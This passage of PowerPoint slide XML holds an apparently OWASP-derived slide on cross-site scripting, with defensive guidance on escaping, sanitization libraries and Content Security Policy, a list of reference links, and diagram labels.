                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>OWASP DOM based XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>OWASP Java Encoder API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>ASVS: Output Encoding/Escaping Requirements (V6)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP AntiSamy: Sanitization Library</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>Testing Guide: 1st 3 Chapters on Data Validation Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>OWASP Code Review Guide: Chapter on XSS Review</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>OWASP XSS Filter Evasion Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CWE Entry 79 on Cross-Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="35814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How Do I Prevent XSS?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preventing XSS requires separation of untrusted data from active browser content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To avoid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, the preferred option is to properly escape untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>OWASP XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> for details on the required data escaping techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To avoid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, the preferred option is to avoid passing untrusted data to JavaScript and other browser APIs that can generate active content. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>OWASP DOM based XSS Prevention Cheat Sheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For rich content, consider auto-sanitization libraries like OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>AntiSamy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>Java HTML Sanitizer Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to defend against XSS across your entire site.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="51" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="60" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>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p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="61" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="62" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="63" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="64" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Vectors</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1049628"/>
                <a:ext cx="685800" cy="428655"/>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00" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Technical</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="54" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537" cy="123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55" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2188570" y="1262418"/>
                <a:ext cx="630830" cy="1233"/>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56" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="50" idx="3"/>
                <a:endCxn id="53" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3899848" y="1263956"/>
                <a:ext cx="900752" cy="421"/>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57" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="304800" y="1280701"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
